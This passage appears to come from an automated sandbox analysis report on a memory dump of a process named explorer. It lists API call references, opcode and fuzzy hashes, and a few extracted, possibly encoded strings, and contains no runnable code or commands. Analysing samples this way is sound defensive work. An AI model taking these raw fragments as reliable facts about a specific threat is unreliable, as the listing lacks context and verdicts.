                                                                                                                                                                                                                        • Opcode ID: 8673bec0ae27de947d12427a1fb762c601584bedd8f5ba26006f1bb40946f263
                                                                                                                                                                                                                        • Instruction ID: 2999c1a9d31d97cd17417e9a13a0adb8cda44f053ee17898522d98161a081a57
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8673bec0ae27de947d12427a1fb762c601584bedd8f5ba26006f1bb40946f263
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DB15A71C00209EFCF29DFA4C9C09AEBBB6FF04394B14425AEA156B291D731DA51EF91
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1671E
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1672A
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F16735
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F16740
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1674B
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F16756
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F16761
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F1676C
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F16777
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F16785
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                        • Opcode ID: d2511d8b122bdf4329d9bd818e3741a3cfe788200dca66d8fc1add638fb19d1c
                                                                                                                                                                                                                        • Instruction ID: c374363c4c48c600d51c2e20de4053433fd5cce00a10d371c625bebe3720548a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2511d8b122bdf4329d9bd818e3741a3cfe788200dca66d8fc1add638fb19d1c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C217CBA900108AFDB42EF94CD40DDD7BB9FF08380F5141A5E619AB121EB31E654CF80
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 269201875-0
                                                                                                                                                                                                                        • Opcode ID: 40cb9523b3089c3261c78eaa89e188599e7b9614ae3eac84c9877611507c7526
                                                                                                                                                                                                                        • Instruction ID: 72b84b006ce79e8898924f49bf0fb3ea39d0ff55671186552673fe86efafb3f8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40cb9523b3089c3261c78eaa89e188599e7b9614ae3eac84c9877611507c7526
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0B61E4779002159FDB30EF64C840BAAB7F9EB55394F60456DEA45EB280EB70A944CB90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3943753294-0
                                                                                                                                                                                                                        • Opcode ID: f719135e8562eb1cb5f7446292a3ebad1e44d9a7c00b78ae0c9b12c2934c5068
                                                                                                                                                                                                                        • Instruction ID: e2980804746b8ee64d53761c072170204cd13c61bfda82a8d49ed07d90681424
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f719135e8562eb1cb5f7446292a3ebad1e44d9a7c00b78ae0c9b12c2934c5068
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A512DB1E00219DFCF10EF64C5C4AA9B7B5FF087D5B15845AEA06AB285DB30E940DF94
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$Cnd_broadcast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3990724213-0
                                                                                                                                                                                                                        • Opcode ID: e97fd323b5269c1d97c619242642a7bda5670139262094c1283c1208a42f8374
                                                                                                                                                                                                                        • Instruction ID: 4e655ba8a7624b95630c4d3ee57eba559f6dfb56aa6b25be3e9fac97d3529375
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e97fd323b5269c1d97c619242642a7bda5670139262094c1283c1208a42f8374
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15B11471D006499BDF20DFA4C988BAEBBF5AF05394F004569EE16972C1EB34A904DFA1
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02EEA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,F48E75C7,00000000,?), ref: 02EEA4BA
                                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,00000000,00000000,02F46494,0000000E,F48E75C7,00000000,00000000), ref: 02EFABED
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AttributesFileFolderPath
                                                                                                                                                                                                                        • String ID: .$246122658369$2A==$4TI=$4Xlg
                                                                                                                                                                                                                        • API String ID: 1512852658-2476712899
                                                                                                                                                                                                                        • Opcode ID: 42535a390da486aaa2b791e0c8b84fa06be7dc6ec543fdf0e5f5ec24af0e8f9f
                                                                                                                                                                                                                        • Instruction ID: 26c43cab27b7478e35b95203e02a8fee252d6ccd8dd353f4758be02e7cd6554f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42535a390da486aaa2b791e0c8b84fa06be7dc6ec543fdf0e5f5ec24af0e8f9f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75E19270D0128CDFEF14DBA4CA487DDBFB6AF55308F508188D5096B282C7B55A88DFA1
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: list too long
                                                                                                                                                                                                                        • API String ID: 0-1124181908
                                                                                                                                                                                                                        • Opcode ID: 72ae74f1f4b02655dd6e78626717070833367f51985182b356fb59cb12a5cf8e
                                                                                                                                                                                                                        • Instruction ID: b5cbcdabbedbbdc3450d2ef26dd70a82d5f9e39f9428a501a7f3f40a9e707a4a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72ae74f1f4b02655dd6e78626717070833367f51985182b356fb59cb12a5cf8e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1551B1B4D443199BEB10DF64CC45B99F7B5FB04750F1082AAEA0CA7280EB70AA91DF95
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02F0C517
                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 02F0C51F
                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02F0C5A8
                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 02F0C5D3
                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02F0C628
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                        • Opcode ID: ee43ddbd02a2ff8360d636d2c3d443d21914a4ca914df67a7453337a1cb1c653
                                                                                                                                                                                                                        • Instruction ID: 9f33129107e7e5d7b9f213e96db0dd86bfe8cd145b2cb2c24549c3c89b4becda
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee43ddbd02a2ff8360d636d2c3d443d21914a4ca914df67a7453337a1cb1c653
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83418738E001089BCF10DF68C8C0AAEBBB6EF453A8F148256EA196B3D1D771D915DF90
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                        • API String ID: 0-537541572
                                                                                                                                                                                                                        • Opcode ID: 084678bc80e1398d95852395209f015cb5b9b6dfd8a68c9f2efba8d6d52ff294
                                                                                                                                                                                                                        • Instruction ID: 94d9b6aee78f371db41f62d207f8eeed192b24ff9e2017510da70e30572f7330
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 084678bc80e1398d95852395209f015cb5b9b6dfd8a68c9f2efba8d6d52ff294
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4621E773F41224ABFB224A259D85B6A7759AF02BE4F950514EF06B7290DB30DC00CAE0
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 02F20BD4: _free.LIBCMT ref: 02F20BF9
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20ED6
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: HeapFree.KERNEL32(00000000,00000000,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?), ref: 02F17C1C
                                                                                                                                                                                                                          • Part of subcall function 02F17C06: GetLastError.KERNEL32(?,?,02F20BFE,?,00000000,?,8B18EC83,?,02F20EA1,?,00000007,?,?,02F21346,?,?), ref: 02F17C2E
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20EE1
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20EEC
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20F40
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20F4B
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20F56
                                                                                                                                                                                                                        • _free.LIBCMT ref: 02F20F61
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                        • Opcode ID: 754e41f7b128c0b27d83c6c6f545dee9b963ccc8453acbe9e150d344b889af71
                                                                                                                                                                                                                        • Instruction ID: 643634c941b474b7e9b20ef9eccf5fd8a68aa1ff9f7d1c74e92f3c372bb2a0fa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 754e41f7b128c0b27d83c6c6f545dee9b963ccc8453acbe9e150d344b889af71
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0711E272940714ABE539BBB0CC45FCBF79E9F15784F404819A3AEB6150EB76B5084F90
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 02F17207
                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 02F173EC
                                                                                                                                                                                                                        • __fassign.LIBCMT ref: 02F17409
                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,8B18EC83,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F17451
                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 02F17491
                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 02F17539
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1735259414-0
                                                                                                                                                                                                                        • Opcode ID: 9e867b8b3d55aee651fee146aa4a7a214dace030fe1107d70dee2cf17b18260b
                                                                                                                                                                                                                        • Instruction ID: 9db86bbace3caf5391e7f5a7f96701cb322e8a7e68608c52404f188c04e68b1c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e867b8b3d55aee651fee146aa4a7a214dace030fe1107d70dee2cf17b18260b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8C1AC71D042588FCB14DFA8C9809EDFBB5AF08354F68416AE95ABB341E7319E42CF60
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 02F0950F
                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 02F0957A
                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F09597
                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02F095D6
                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02F09635
                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 02F09658
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2829165498-0
                                                                                                                                                                                                                        • Opcode ID: 2c214c11fcee595460b408d01ddb857355ccf8dc65bb7f3d93ab7197bac4cc3b
                                                                                                                                                                                                                        • Instruction ID: d3de5640d093ec24c713e68b975d152e9d108ef279eb04e4a92583dcfa90d2c3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c214c11fcee595460b408d01ddb857355ccf8dc65bb7f3d93ab7197bac4cc3b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5151B572A0024AABDF208FA1DC84FAB7BAAEF44FD4F144519FA11961D1EBB1C910DF50
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02F044A5
                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 02F044C7
                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02F044E7
                                                                                                                                                                                                                        • __Getctype.LIBCPMT ref: 02F0457D
                                                                                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 02F0459C
                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 02F045B4
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601488609.0000000002F52000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_2ee0000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1102183713-0
                                                                                                                                                                                                                        • Opcode ID: d385910dd3c5fb4fd1062927eb0cb63a1f164fdfd9924eb6d149a8d34b6b6b18
                                                                                                                                                                                                                        • Instruction ID: b367b97d613bc5c5dbfabe433e1438dcc031c24aee6b8cef6fb8fa68f851f284
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d385910dd3c5fb4fd1062927eb0cb63a1f164fdfd9924eb6d149a8d34b6b6b18
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC41AB75E002198FDB21DF54C980BAEB7F5EF54790F148569EA06AB380EB70AA45DB80
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • Sleep.KERNEL32(00000064,F48E75C7,?,00000000,02F28B8D,000000FF), ref: 02EE8A1C
                                                                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 02EE8AB6
                                                                                                                                                                                                                          • Part of subcall function 02F09788: EnterCriticalSection.KERNEL32(02F47FA8,76F90F00,?,02EE8ABB,02F4BDC0,02F2FB90), ref: 02F09792
                                                                                                                                                                                                                          • Part of subcall function 02F09788: LeaveCriticalSection.KERNEL32(02F47FA8,?,02EE8ABB,02F4BDC0,02F2FB90), ref: 02F097C5
                                                                                                                                                                                                                          • Part of subcall function 02F09788: WakeAllConditionVariable.KERNEL32(?,02F4BDC0,02F2FB90), ref: 02F0983C
                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,02EE8880,02F4B578,00000000,00000000), ref: 02EE8B1B
                                                                                                                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02EE8B26
                                                                                                                                                                                                                          • Part of subcall function 02F097D2: EnterCriticalSection.KERNEL32(02F47FA8,00000000,76F90F00,?,02EE8A41,02F4BDC0), ref: 02F097DD
                                                                                                                                                                                                                          • Part of subcall function 02F097D2: LeaveCriticalSection.KERNEL32(02F47FA8,?,02EE8A41,02F4BDC0), ref: 02F0981A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2601296537.0000000002EE1000.00000020.00000001.01000000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601258081.0000000002EE0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601363769.0000000002F30000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601416450.0000000002F45000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2601459265.0000000002F4C000.00000002.00000001.01000000.00000000.sdmpDownload File
